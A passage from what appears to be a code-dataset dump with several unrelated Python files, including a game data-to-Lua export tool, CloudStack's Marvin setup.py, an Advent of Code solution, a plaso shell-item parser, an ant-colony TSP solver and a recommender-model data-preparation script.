self.loadVersionTxt(os.path.join(self.newVersionDir, 'version.txt'))\n\n if (version != self.sdataVersion):\n self.log(\"错误的打包静态库版本号:%s, 输入版本号:%s\", version, self.sdataVersion)\n sys.exit(2)\n\n self.log(\"sdataXmlFile:%s\", self.sdataXmlFile)\n\n\n '''\n 生产sdataLua文件\n '''\n def genSdataToLua(self):\n if self.mode == 'db':\n self.genSdataToLuaByDB()\n else:\n self.genSdataToLuaByXML()\n\n '''\n 生产sdataLua文件(db)\n '''\n def genSdataToLuaByDB(self):\n # 读取xml文件\n self.log(\"genSdataToLua\")\n\n tablesMap = {}\n filePath = os.path.join(self.newVersionDir, 'SdataData.lua')\n f = open(filePath, 'wb')\n results = self.dbutil.query(\"show tables\")\n for tableName in results:\n name = tableName['Tables_in_%s'%self.dbConf['db']]\n # 查看配置文件是否需要处理\n if not self.tablesConf.has_key(name):\n continue\n\n tableResults = self.dbutil.query(\"select * from %s\"%name)\n datas = []\n rowKeys = self.tablesConf[name]['rowKey']\n for row in tableResults:\n dataMap = {}\n for key, value in row.iteritems():\n dataMap[str(key)] = self.getValue(value)\n\n dataMap['rowData'] = ''\n for rowKey in rowKeys.split(\",\"):\n if dataMap['rowData'] != '':\n dataMap['rowData'] = dataMap['rowData'] + \"-\" + dataMap[rowKey]\n else:\n dataMap['rowData'] = dataMap[rowKey]\n datas.append(dataMap)\n\n tableMap = {}\n tableMap['datas'] = datas\n tableMap['fields'] = self.tablesConf[name]['fields']\n tablesMap[name] = tableMap\n\n # 载入模板环境\n env = Loader(self.confFilePath).env\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # 生成domain文件\n self.log(\"configFilePath:%s\", self.confFilePath)\n template = env.get_template(\"sdatatolua.template\", parent=self.confFilePath)\n result = template.render(tables=tablesMap, time=now, sdataVersion=self.sdataVersion)\n\n contentMD5 = self.md5(result.encode(\"utf-8\"))\n\n f.write(result.encode('utf8'))\n f.write('sdata.time = \"%s\"\\n'%now)\n f.write('sdata.version = \"%s\"\\n'%self.sdataVersion)\n f.write('sdata.md5 = \"%s\"'%contentMD5)\n f.flush()\n\n\n fileMD5 = self.md5file(filePath)\n self.log(\"contentMD5:%s\", contentMD5)\n self.log(\"fileMD5:%s\", fileMD5)\n self.log(\"filePath:%s\", os.path.abspath(filePath))\n\n # 生产zipFile\n fileList = []\n fileList.append('SdataData.lua')\n self.createZipFile(os.path.join(self.sdataDir, contentMD5+\".zip\"), fileList)\n\n '''\n 生产sdataLua文件(XML)\n '''\n def genSdataToLuaByXML(self):\n # 读取xml文件\n self.log(\"genSdataToLua\")\n domTree = ET.ElementTree(file=self.sdataXmlFile)\n root = domTree.getroot()\n\n filePath = os.path.join(self.newVersionDir, 'SdataData.lua')\n f = open(filePath, 'wb')\n tablesMap = {}\n for child in domTree.iter(tag='table'):\n table = child\n name = table.attrib[\"name\"]\n\n # 查看配置文件是否需要处理\n if not self.tablesConf.has_key(name):\n continue\n\n datas = []\n for row in table:\n dataMap = {}\n for field in row:\n key = field.attrib[\"name\"]\n value = field.text\n dataMap[key] = value\n datas.append(dataMap)\n\n tableMap = {}\n tableMap['datas'] = datas\n tableMap['rowKey'] = self.tablesConf[name]['rowKey']\n tableMap['fields'] = self.tablesConf[name]['fields']\n tablesMap[name] = tableMap\n\n # 载入模板环境\n env = Loader().env\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # 生成domain文件\n template = env.get_template(\"sdatatolua.template\", self.confFilePath)\n result = template.render(tables=tablesMap, time=now, sdataVersion=self.sdataVersion)\n\n contentMD5 = self.md5(result.encode(\"utf-8\"))\n\n f.write(result.encode('utf8'))\n f.write('sdata.time = \"%s\"\\n'%now)\n f.write('sdata.version = \"%s\"\\n'%self.sdataVersion)\n f.write('sdata.md5 = \"%s\"'%contentMD5)\n f.flush()\n\n\n fileMD5 = self.md5file(filePath)\n self.log(\"contentMD5:%s\", contentMD5)\n self.log(\"fileMD5:%s\", fileMD5)\n\n '''\n 执行清理操作\n '''\n def doClean(self):\n try:\n shutil.rmtree(self.newVersionDir)\n except:\n pass\n\n '''\n 载入version.txt\n '''\n def loadVersionTxt(self, filepath):\n # 打开version.lua\n version = None\n resFile = open(filepath, 'rb')\n for line in resFile.readlines():\n if line == None or line.strip() == \"\":\n continue\n line = line.strip()\n version = line.strip()\n break\n\n resFile.close()\n\n return version\n\n '''\n 创建zipfile\n '''\n def createZipFile(self, zipFilePath, fileList):\n self.log(\"生成包:%s\", zipFilePath)\n zFile = zipfile.ZipFile(zipFilePath, 'w', compression=zipfile.ZIP_DEFLATED)\n\n for filename in fileList:\n filepath = os.path.join(self.newVersionDir, filename)\n zFile.write(filepath, filename)\n # self.log(\"pack zip file:%s, file:%s\", zipFilePath, filename)\n\n zFile.close()\n\n '''\n 拷贝文件\n '''\n def copyFile(self, filepath, filename):\n topath = os.path.join(self.out_dir, filename)\n self.execCmd(\"cp %s %s\", filepath, topath)\n\n '''\n 计算字符串md5\n '''\n def md5(self, content):\n m = hashlib.md5()\n m.update(content)\n\n return m.hexdigest()\n\n '''\n 计算文件md5\n '''\n def md5file(self, filepath):\n m = hashlib.md5()\n md5file = open(filepath, 'rb')\n m.update(md5file.read())\n md5file.close()\n\n return m.hexdigest()\n\n '''\n 执行系统命令\n '''\n def execCmd(self, cmd, *args):\n print(args)\n if args != None and len(args) > 0:\n cmd = cmd%args\n\n p = os.popen(cmd)\n self.log(\"exec cmd: %s end. rtn:%s\", cmd, p.read())\n\n '''\n 打印日志\n '''\n def log(self, fmt, *args):\n if args == None and len(args) == 0:\n return\n\n print(fmt%args)\n\n '''\n 获取值\n '''\n def doSQL(self, sql):\n return sql.replace('%s', '\\'' + '%s' + '\\'')\n \n '''\n 获取db值\n '''\n def getValue(self, value):\n valueTypeName = type(value).__name__\n rtn = None\n if valueTypeName != 'str' and valueTypeName != 'unicode':\n rtn = str(value)\n else:\n rtn = value\n\n if rtn.find('\"') != -1:\n rtn = rtn.replace('\"', '\\\\\"')\n return rtn\n\ndef main(argv):\n config = {\n \"game\": \"zjzr2\",\n \"sdata_zip_path\": \"C:\\\\Users\\\\wangys\\\\Downloads\\\\sdata.zip\",\n \"sdata_version\": \"0.0.0.0\",\n \"env\": \"dev\",\n \"mode\": \"db\",\n \"config_file_path\": \"tools\"\n }\n try:\n opts, args = getopt.getopt(argv, \"g:p:v:r:s:e:t:h:\", [\"game=\", \"path=\", \"version=\", \"region\", \"scope=\", \"env=\", \"tips=\", \"help=\"])\n except getopt.GetoptError:\n print('hotupdate -g -p -v -r -s -e [-t ]')\n sys.exit(2)\n\n for opt, arg in opts:\n if opt in (\"-g\", \"--game\"):\n config['game'] = arg\n elif opt in (\"-p\", \"--path\"):\n config['res_zip_path'] = arg\n elif opt in (\"-v\", \"--version\"):\n config['game_version'] = arg\n elif opt in (\"-r\", \"--region\"):\n config['region'] = arg\n elif opt in (\"-s\", \"--scope\"):\n config['scope'] = arg\n elif opt in (\"-e\", \"--env\"):\n config['env'] = arg\n elif opt in (\"-t\", \"--tips\"):\n config['update_tips'] = arg\n elif opt in (\"-h\", \"--help\"):\n print('hotupdate -g -p -v -r -s -e [-t ]')\n # /home/hario/hotupdate.sh --game ${option.game} --region ${option.region} --scope ${option.scope} --version ${option.version} --env ${option.env} --isBeta ${option.isBeta} --hides ${option.hides}\n # -g gmmx -p F:/hotupdate/gmmx_cn_9.9.9.9_android_20190527180239_191_static_dynamic.zip -v 9.9.9.9 -r cn_luajit32 -u android,ast -t tips\n\n p = sdatatolua(config)\n p.doSdataToLua()\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"qq4215279/study_python","sub_path":"py_study_2.7_test/sbtj_tools/sdatatolua.py","file_name":"sdatatolua.py","file_ext":"py","file_size_in_byte":13589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33780711425","text":"try:\n from setuptools import setup, find_packages\nexcept ImportError:\n try:\n from distribute_setup import use_setuptools\n use_setuptools()\n from setuptools import setup, find_packages\n except ImportError:\n raise RuntimeError(\"python setuptools is required to build Marvin\")\n\n\nVERSION = \"4.19.0.0\"\n\nsetup(name=\"Marvin\",\n version=VERSION,\n description=\"Marvin - Python client for Apache CloudStack\",\n author=\"The Apache CloudStack Team\",\n author_email=\"dev@cloudstack.apache.org\",\n maintainer=\"The Apache CloudStack Team\",\n maintainer_email=\"dev@cloudstack.apache.org\",\n long_description=\"Marvin is the Apache CloudStack python \"\n \"client written around the unittest framework\",\n platforms=(\"Any\",),\n url=\"https://builds.apache.org/job/cloudstack-marvin/\",\n packages=[\"marvin\", \"marvin.cloudstackAPI\",\n \"marvin.lib\", \"marvin.config\", \"marvin.sandbox\",\n \"marvin.sandbox.advanced\", \"marvin.sandbox.advancedsg\",\n \"marvin.sandbox.basic\"],\n license=\"LICENSE.txt\",\n install_requires=[\n \"mysql-connector-python <= 8.0.30\",\n \"requests >= 2.2.1\",\n \"paramiko >= 1.13.0\",\n \"nose >= 1.3.3\",\n \"ddt >= 0.4.0\",\n \"pyvmomi >= 5.5.0\",\n \"netaddr >= 0.7.14\",\n \"dnspython\",\n \"ipmisim >= 0.7\",\n \"pytz\",\n \"retries\",\n \"PyCrypt\",\n \"kubernetes\",\n \"urllib3\",\n \"setuptools >= 40.3.0\"\n ],\n py_modules=['marvin.marvinPlugin'],\n zip_safe=False,\n entry_points={\n 'nose.plugins': ['marvinPlugin = marvin.marvinPlugin:MarvinPlugin'],\n 'console_scripts': ['marvincli = marvin.deployAndRun:main']\n },\n )\n","repo_name":"apache/cloudstack","sub_path":"tools/marvin/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":1557,"dataset":"github-code","pt":"32"} +{"seq_id":"19202127125","text":"file = open('puzzle/07.in', 'r')\ncontent = file.read().splitlines()\n\n# part 1\nmatryoshka = {'shiny gold'}\nbf_length = 0\nwhile bf_length != len(matryoshka):\n bf_length = len(matryoshka)\n for expression in content:\n contained_colors = set()\n for sentence in expression.split('contain')[1].split(','):\n contained_colors.add(sentence[3:sentence.index('bag') - 1])\n if set.intersection(matryoshka, contained_colors) != set():\n matryoshka.add(expression.split('contain')[0][:-6])\nmatryoshka.remove('shiny gold')\nprint(len(matryoshka))\n\n# part 2\nparents = {}\nfor expression in content:\n if expression.split('bags')[0][:-1] not in matryoshka:\n if expression.split('contain ')[1] == 'no other bags.':\n parents[expression.split('bags')[0][:-1]] = 0\n else:\n inside = expression.split('contain')[1].split(',')\n value = []\n for bag in inside:\n value.extend([bag[1], bag[3:bag.index('bag')-1]])\n parents[expression.split('bags')[0][:-1]] = value\nint_parents = {}\nfor bag in parents:\n if isinstance(parents[bag], int):\n int_parents[bag] = parents[bag]\n\nwhile int_parents != parents:\n for color in parents:\n if color not in int_parents:\n for bag in range(1, len(parents[color]), 2):\n if parents[color][bag] not in int_parents:\n break\n else:\n value = 0\n for bag in range(0, len(parents[color]), 2):\n value += int(parents[color][bag])*(1 + parents[parents[color][bag+1]])\n parents[color] = int_parents[color] = value\nprint(parents['shiny gold'])\n","repo_name":"michalwasik/Advent-of-Code","sub_path":"2020/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17029632021","text":"import pyfwsi\n\nfrom plaso.events import shell_item_events\nfrom plaso.lib import eventdata\nfrom plaso.winnt import shell_folder_ids\n\n\nif pyfwsi.get_version() < '20140714':\n raise ImportWarning(\n u'Shell item support fuctions require at least pyfwsi 20140714.')\n\n\nclass ShellItemsParser(object):\n \"\"\"Parses for Windows NT shell items.\"\"\"\n\n NAME = 'shell_items'\n\n def __init__(self, origin):\n \"\"\"Initializes the parser.\n\n Args:\n origin: A string containing the origin of the event (event source).\n \"\"\"\n super(ShellItemsParser, self).__init__()\n self._origin = origin\n self._path_segments = []\n\n def _ParseShellItem(self, parser_context, shell_item):\n \"\"\"Parses a shell item.\n\n Args:\n parser_context: A parser context object (instance of ParserContext).\n shell_item: the shell item (instance of pyfwsi.item).\n \"\"\"\n path_segment = None\n\n if isinstance(shell_item, pyfwsi.root_folder):\n description = shell_folder_ids.DESCRIPTIONS.get(\n shell_item.shell_folder_identifier, None)\n\n if description:\n path_segment = description\n else:\n path_segment = u'{{{0:s}}}'.format(shell_item.shell_folder_identifier)\n\n elif isinstance(shell_item, pyfwsi.volume):\n if shell_item.name:\n path_segment = shell_item.name\n elif shell_item.identifier:\n path_segment = u'{{{0:s}}}'.format(shell_item.identifier)\n\n elif isinstance(shell_item, pyfwsi.file_entry):\n long_name = u''\n localized_name = u''\n file_reference = u''\n for exension_block in shell_item.extension_blocks:\n if isinstance(exension_block, pyfwsi.file_entry_extension):\n long_name = exension_block.long_name\n localized_name = exension_block.localized_name\n file_reference = exension_block.file_reference\n if file_reference:\n file_reference = u'{0:d}-{1:d}'.format(\n file_reference & 0xffffffffffff, file_reference >> 48)\n\n fat_date_time = exension_block.get_creation_time_as_integer()\n if fat_date_time:\n event_object = shell_item_events.ShellItemFileEntryEvent(\n fat_date_time, eventdata.EventTimestamp.CREATION_TIME,\n shell_item.name, long_name, localized_name, file_reference,\n self._origin)\n parser_context.ProduceEvent(event_object, parser_name=self.NAME)\n\n fat_date_time = exension_block.get_access_time_as_integer()\n if fat_date_time:\n event_object = shell_item_events.ShellItemFileEntryEvent(\n fat_date_time, eventdata.EventTimestamp.ACCESS_TIME,\n shell_item.name, long_name, localized_name, file_reference,\n self._origin)\n parser_context.ProduceEvent(event_object, parser_name=self.NAME)\n\n fat_date_time = shell_item.get_modification_time_as_integer()\n if fat_date_time:\n event_object = shell_item_events.ShellItemFileEntryEvent(\n fat_date_time, eventdata.EventTimestamp.MODIFICATION_TIME,\n shell_item.name, long_name, localized_name, file_reference,\n self._origin)\n parser_context.ProduceEvent(event_object, parser_name=self.NAME)\n\n if long_name:\n path_segment = long_name\n elif shell_item.name:\n path_segment = shell_item.name\n\n elif isinstance(shell_item, pyfwsi.network_location):\n if shell_item.location:\n path_segment = shell_item.location\n\n if path_segment is None and shell_item.class_type == 0x00:\n # TODO: check for signature 0x23febbee\n pass\n\n if path_segment is None:\n path_segment = u'UNKNOWN: 0x{0:02x}'.format(shell_item.class_type)\n\n self._path_segments.append(path_segment)\n\n def CopyToPath(self):\n \"\"\"Copies the shell items to a path.\n\n Returns:\n A Unicode string containing the converted shell item list path or None.\n \"\"\"\n if not self._path_segments:\n return\n\n return u', '.join(self._path_segments)\n\n def Parse(self, parser_context, byte_stream, codepage='cp1252'):\n \"\"\"Parses the shell items from the byte stream.\n\n Args:\n parser_context: A parser context object (instance of ParserContext).\n byte_stream: a string holding the shell items data.\n codepage: Optional byte stream codepage. The default is cp1252.\n \"\"\"\n self._path_segments = []\n shell_item_list = pyfwsi.item_list()\n shell_item_list.copy_from_byte_stream(byte_stream, ascii_codepage=codepage)\n\n for shell_item in shell_item_list.items:\n self._ParseShellItem(parser_context, shell_item)\n","repo_name":"cvandeplas/plaso","sub_path":"plaso/parsers/shared/shell_items.py","file_name":"shell_items.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"17904132363","text":"\"\"\"\nCode Reference : https://github.com/Akavall/AntColonyOptimization\n\"\"\"\nimport random as rn\nimport numpy as np\nfrom numpy.random import choice as np_choice\nimport random\nimport pandas as pd\nimport operator\nimport time\n\nclass AntColony:\n def __init__(self, distances, n_ants, n_best, n_iterations, decay, alpha=1, beta=1):\n \"\"\"\n Args:\n distances (2D numpy.array): Square matrix of distances. Diagonal is assumed to be np.inf.\n n_ants (int): Number of ants running per iteration\n n_best (int): Number of best ants who deposit pheromone\n n_iteration (int): Number of iterations\n decay (float): Rate it which pheromone decays. The pheromone value is multiplied by decay, so 0.95 will lead to decay, 0.5 to much faster decay.\n alpha (int or float): exponenet on pheromone, higher alpha gives pheromone more weight. Default=1\n beta (int or float): exponent on distance, higher beta give distance more weight. Default=1\n\n Example:\n ant_colony = AntColony(german_distances, 100, 20, 2000, 0.95, alpha=1, beta=2) \n \"\"\"\n self.distances = distances\n self.pheromone = np.ones(self.distances.shape) / len(distances)\n self.all_inds = range(len(distances))\n self.n_ants = n_ants\n self.n_best = n_best\n self.n_iterations = n_iterations\n self.decay = decay\n self.alpha = alpha\n self.beta = beta\n\n \n def run(self):\n shortest_path = None\n all_time_shortest_path = (\"placeholder\", np.inf)\n for i in range(self.n_iterations):\n all_paths = self.gen_all_paths()\n self.spread_pheronome(all_paths, self.n_best, shortest_path=shortest_path)\n shortest_path = min(all_paths, key=lambda x: x[1])\n #print(\"Length of the Shortest path during \"+str(i)+\" iteration is \"+str(shortest_path[1]))\n if shortest_path[1] < all_time_shortest_path[1]:\n all_time_shortest_path = shortest_path \n self.pheromone * self.decay \n return all_time_shortest_path\n\n def spread_pheronome(self, all_paths, n_best, shortest_path):\n sorted_paths = sorted(all_paths, key=lambda x: x[1])\n for path, dist in sorted_paths[:n_best]:\n for move in path:\n self.pheromone[move] += 1.0 / self.distances[move]\n\n def gen_path_dist(self, path):\n total_dist = 0\n for ele in path:\n total_dist += self.distances[ele]\n return total_dist\n\n def gen_all_paths(self):\n all_paths = []\n for i in range(self.n_ants):\n path = self.gen_path(0)\n all_paths.append((path, self.gen_path_dist(path)))\n return all_paths\n\n def gen_path(self, start):\n path = []\n visited = set()\n visited.add(start)\n prev = start\n for i in range(len(self.distances) - 1):\n move = self.pick_move(self.pheromone[prev], self.distances[prev], visited)\n path.append((prev, move))\n prev = move\n visited.add(move)\n path.append((prev, start)) # going back to where we started \n return path\n\n def pick_move(self, pheromone, dist, visited):\n pheromone = np.copy(pheromone)\n pheromone[list(visited)] = 0\n\n row = pheromone ** self.alpha * (( 1.0 / dist) ** self.beta)\n\n norm_row = row / row.sum()\n move = np_choice(self.all_inds, 1, p=norm_row)[0]\n return move\n\n\ndef read_data(data_file):\n df = pd.read_csv(data_file) \n nodes = []\n for i in range(len(df['pairs'])):\n sp = df['pairs'][i].split(' ')\n x = float(sp[1])\n y = float(sp[2])\n nodes.append([x, y])\n return nodes\n\n \ndef eucledian_distance(a, b):\n ret = 0\n for i in range(len(a)):\n ret += (a[i] - b[i]) ** 2\n return ret ** 0.5\n\n\ndef main(data_file):\n start = time.time()\n\n beta = 2\n q0 = 0.95\n alpha = 0.1\n peta = 0.1\n n_ants = 20 #No of Ants\n m_ants = 5\n iterations = 100\n\n nodes = read_data(data_file)\n\n arrs = [[np.inf]*len(nodes)]*len(nodes)\n\n for i in range(len(nodes)):\n for j in range(i+1, len(nodes)):\n arrs[i][j] = eucledian_distance(nodes[i], nodes[j])\n arrs[j][i] = arrs[i][j]\n\n distances = np.array(arrs)\n\n ant_colony = AntColony(distances, n_ants, m_ants, iterations, q0, alpha, beta)\n\n shortest_path = ant_colony.run()\n print('Shortest Path Length', str(shortest_path[1]))\n\n time_lapse = time.time() - start\n print('Time lapsed', time_lapse)\n\nif __name__=='__main__':\n main(data_file)","repo_name":"Shraddha2702/Summer_AI","sub_path":"TravelingSalesman/Algorithms/.ipynb_checkpoints/AntColonyAlgo-checkpoint.py","file_name":"AntColonyAlgo-checkpoint.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3985351358","text":"class Person:\n def __init__(self, name):\n self.name = name\n\n def __str__(self):\n return self.name\n\n def push_name(self, person):\n person.name = self.name\n\n def attack(self, person):\n name = str(person)\n for _ in str(name):\n if _ in self.name.lower() + self.name.upper():\n name = name.replace(_, '')\n person.name = name\n\n def show_name(self):\n print(f\"Hello, I am {self.name}\")\n\n\nclass Destroyer:\n def __init__(self, chars, replace_chars='#'):\n self.chars = chars\n self.replace_chars = replace_chars\n\n def __call__(self, person):\n name = str(person)\n repl_list = []\n for _ in str(name):\n if _ in self.chars.lower() + self.chars.upper():\n name = name.replace(_, self.replace_chars)\n repl_list.append(f\"'{_.lower()}'\")\n repl_list = list(set(repl_list))\n repl_list.sort()\n print(f\"Destroyed: {', '.join(set(repl_list))} from {name}'s name.\")\n person.name = name\n return person\n\n\nif __name__ == '__main__':\n john = Person(\"John\")\n alberta = Person(\"Alberta\")\n print(john, alberta)\n v_kill = Destroyer(\"aeiou\")\n v_kill(john)\n print(john, alberta)\n alpha_kill = Destroyer(\"\".join(chr(i) for i in range(65, 91)), \"\")\n print(john, alberta)\n alpha_kill(john)\n print(john, alberta)\n alberta.push_name(john)\n print(john, alberta)\n caitlin = Person(\"Caitlin\")\n john.attack(caitlin)\n print(caitlin)\n v_kill(caitlin).show_name()\n alberta.show_name()\n","repo_name":"berson969/InterviewTests","sub_path":"bykov_decision.py","file_name":"bykov_decision.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38520362131","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 8 11:34:08 2019\n\n@author: gzs13133\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nimport matplotlib.pylab as plt\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.linear_model import LogisticRegression\n\nimport os \nos.chdir('C://Users//GZS13133//intern//data//data_with_hist')\nimport keras.backend as K\nfrom base_structure import draw\nfrom model import ccBaseModel, ccDINModelwithOneHist, ccdeepFM\nfrom data_process import judge_multi_feature, multi_column_info, one_column_inde_info, train_test_split, \\\n sample_weight_generate, nlp_weight_dict, nlp_wor2vec_dict, gametype_word2evc_list, \\\n train_test_split_all, column_count_bar, data_build\n\n\n'''数据类型\nsn, gametype, label, \nandroid_app: 1001 types, 250 length, sn\nios_app: 1001 types, 8 length, sn\nmobile_model: 1001 types, 20 length, sn \ninterest_gametype: : 24 types, 9 length, sn\ngametype_label: 1000 types, 20 length, game\ngametype_hotrank_by_aid_cnt: 51 types, 1 length, game \ngametype_hotrank_by_uid_cnt: 51 types, 1 length, game\ngametype_id: 127 types, 1 length, same as gametype\n'''\n\n'''建模的两种思路\n1.将有长度的seqence看成是multi-hot编码的特征输入到DIN模型\n2.将有长度的seqence看成是多个hist序列进行attention求和处理 (不可行,因为特征空间不同,可以引入transformer结构)\n(理解成其他不同的历史行为对用户的推荐产生不一样的影响)\n本质上两者的区别在于是否有attention\n'''\n\n\n############ 数据读取\ncolumns = 'sn, gametype, label, android_app, ios_app, mobile_model, \\\ninterest_gametype, gametype_label, gametype_hotrank_by_aid_cnt, \\\ngametype_hotrank_by_uid_cnt, gametype_id'\n\n#data_route = 'temp'\n#data_route = 'temp_05_09'\ndata_route = 'temp_05_22_train'\ndata_all = pd.read_csv(data_route, header=None, sep='\\t', low_memory=False)\ndata_all.columns = columns.split(', ')\n\n#gametype & gametype_id 一致\n#a, b = list(data['gametype'].values),list(data['gametype_id'].values)\n#sum([1*(a[i]==b[i]) for i in range(len(a))])\ndata_all = data_all.iloc[:,:-1]\n \ndata_all = data_all.fillna('-1')\n\ndata_route = 'temp_05_22_test'\ndata_all_1 = pd.read_csv(data_route, header=None, sep='\\t', low_memory=False)\ndata_all_1.columns = columns.split(', ')\ndata_all_1 = data_all_1.iloc[:,:-1]\ndata_all_1 = data_all_1.fillna('-1')\n\ndata_alll = pd.concat([data_all, data_all_1])\ndata, data_in = train_test_split_all(data_alll, test_num=150000)\ndel data_alll, data_all, data_all_1\n#data_all_with_hist = data_all[data_all['interest_gametype'] != '-1']\n#data_all_without_hist = data_all[data_all['interest_gametype'] == '-1']\n\n#data_all = pd.read_csv('C:/Users/GZS13133/intern/data/csv_data/data_train_all.csv', low_memory=False)\n#data_in = pd.read_csv('C:/Users/GZS13133/intern/data/csv_data/data_test_all.csv', low_memory=False)\n\ndata_all = pd.read_csv('temp_hist_0610', low_memory=False)\n\ndata_all.columns = columns.split(', ')\ndata_all = data_all.iloc[:,:-1] \ndata_all = data_all.fillna('-1')\ndata_all = data_all[data_all['gametype'] != -1]\ndata_all_hist = data_all[data_all['interest_gametype'] != '-1']\ndata_all_hist.to_csv('temp_hist_0610', header=True, index=False)\n#train_num = 5000000\n#data_all = data_build(data_all, train_num, app_minus_inclued=False, sep='::')\ncolumn_count_bar(data_all_hist, 'gametype', 'All')\n\ndata = pd.read_csv('temp_train_0610_100w', low_memory=False)\ndata_in = pd.read_csv('temp_test_0610_1w', low_memory=False)\ndata_all = pd.concat([data, data_in])\n\ndata_temp = data_build(data_all, 800000)\ndata, data_in = train_test_split_all(data_temp, test_num=150000)\n#data.to_csv('temp_train_0627_400w', header=True, index=False)\n#data_in.to_csv('temp_test_0627_15w', header=True, index=False)\ndel data_all, data_temp\n\n\n#不同gametype下的1-0比例不一致,需要先进行分析\ndef fun1(x):\n return sum(x==1)/sum(x==0)\ndef fun2(x):\n return sum(x==1)\ndef fun3(x):\n return sum(x==0)\ndef fun4(x):\n return sum(x==1)/len(x)\ndef fun5(x, total=len(data)):\n return len(x)/total\n\ngametype_ratio = data.groupby('gametype').agg({'label':[fun1, fun2, fun3, fun4, fun5]})\ngametype_ratio.columns = ['label_1/0_rate', 'label_1_num', 'label_0_num', 'label_1_ratio', 'gametype_ratio']\n\n#gametype:[pos_ratio, gametype_ratio]\ngametype_rate_dict = {}\nfor i in zip(gametype_ratio.index, gametype_ratio.iloc[:,3].values, gametype_ratio.iloc[:,4].values):\n gametype_rate_dict[i[0]] = [i[1], i[2]]\n\nsample_nums, train_prop = len(data), 0.97\n#data = data_all\n#del data_all\ntrain_num = int(sample_nums)\n#data = data_build(data_all, sample_nums, gametype_rate_dict)\n#data = data_build(data_all_with_hist, sample_nums, app_minus_inclued=False)\n#613229个sn,即用户;48个gametype\n#len(set(list(data['sn'].values))) \n#temp_0 = data.groupby('sn').agg(len)\n\n\n############ 数据预处理\ndef entropy(label):\n \n temp_1 = np.sum([label == 1]) / len(label)\n temp_2 = 1 - temp_1\n entropy = -(temp_1*np.log(temp_1) + temp_2*np.log(temp_2))\n \n return entropy\n\n#max:0.6931471805599453\nentropy(np.array(data['label'].values)) # 0.6197236875877505\ntemp =data.groupby('gametype_hotrank_by_uid_cnt').agg({'label':entropy})\nnp.sum(temp['label'].values)/len(temp) # 0.40144343228980817\ntemp =data.groupby('gametype_hotrank_by_aid_cnt').agg({'label':entropy})\nnp.sum(temp['label'].values)/len(temp) # 0.4163850320997233\n\ngametype_num = len(set(data['gametype']))\n#发现有个含有-1,可以填充;有个9022的,出现了一个子label,即变短了,也可以填充。\ngametype_label_sp = judge_multi_feature(data, 'gametype', 'gametype_label')\n\n###### game的feature_list生成 \n#生成对应的单长度序列(one:gametype_hotrank_by_aid_cnt & gametype_hotrank_by_uid_cnt),作为两个独立的特征\nhotrank_aid_num, hotrank_aid_list, hotrank_aid_dict = one_column_inde_info(data, 'gametype_hotrank_by_aid_cnt')\nhotrank_uid_num, hotrank_uid_list, hotrank_uid_dict = one_column_inde_info(data, 'gametype_hotrank_by_uid_cnt')\n\n#或者多长度序列(multi:gametype_label)\ngametype_label_num, gametype_label_len, gametype_dict, gametype_label_list, gametype_label_dict, _ = multi_column_info(data, 'gametype_label', 'gametype', sep='::')\n\n#nlp特征\nr1 = 'p2'\nr2 = 'dout2'\n\ngametype_nlp_weight_dict = nlp_weight_dict(r1, gametype_dict)\nword2vec = nlp_wor2vec_dict(r2)\n\nword2vec_list = gametype_word2evc_list(gametype_nlp_weight_dict, word2vec, gametype_num+1)\ndel word2vec\n\n###### sn的feature_list生成 \nsn_num = len(set(data['sn']))\n#一致性检查,发现很多sn下对应multi特征并不一样,但是只需要找到其中最长的作为其特征表示即可\nsn_android_app_sp = judge_multi_feature(data, 'sn', 'android_app')\nsn_ios_app_sp = judge_multi_feature(data, 'sn', 'ios_app')\nsn_mobile_model_sp = judge_multi_feature(data, 'sn', 'mobile_model')\nsn_interest_gametype_sp = judge_multi_feature(data, 'sn', 'interest_gametype')\n\nandroid_app_num, android_app_len, sn_dict, android_app_list, android_app_dict, _ = multi_column_info(data, 'android_app', 'sn', sep='::')\nios_app_num, ios_app_len, _, ios_app_list, ios_app_dict, _ = multi_column_info(data, 'ios_app', 'sn', sep='::')\nmobile_model_num, mobile_model_len, _, mobile_model_list, mobile_model_dict, _ = multi_column_info(data, 'mobile_model', 'sn', sep='::')\ninterest_gametype_num, interest_gametype_len, _, interest_gametype_list, interest_gametype_dict, tr_list = multi_column_info(data, 'interest_gametype', 'sn', gametype_dict=gametype_dict, sep='::')\n\n\n###### model输入生成\n### train准备\nsn_list = list(data['sn'].apply(lambda x:sn_dict[x]).values)\ngametype_list = list(data['gametype'].apply(lambda x:gametype_dict[x]).values)\n#以interest作为hist(其他也转化hist备用)\nhist_list = [interest_gametype_list[i] for i in sn_list]\nhist_last_sequence_list = [tr_list[0][i] for i in sn_list]\npos = [tr_list[1][i] for i in sn_list]\nneg = [tr_list[2][i] for i in sn_list]\nandroid_hist_list = [android_app_list[i] for i in sn_list]\nios_hist_list = [ios_app_list[i] for i in sn_list]\nmobile_hist_list = [mobile_model_list[i] for i in sn_list]\n\nlabel = np.array(list(data['label'].values))\n#根据gametype下的gametype比例以及0-1比例设置sample_weight\nsample_weight_gametype_and_label = sample_weight_generate(gametype_rate_dict)\n\nsample_weight = []\nfor i in range(len(data)):\n temp = str(data['gametype'].iloc[i]) + str(data['label'].iloc[i])\n sample_weight.append(sample_weight_gametype_and_label[temp]) \nsample_weight = np.array(sample_weight)\n \n#构造训练集和测试集\ntrain_sample_index, test_sample_index = train_test_split(data, train_num, 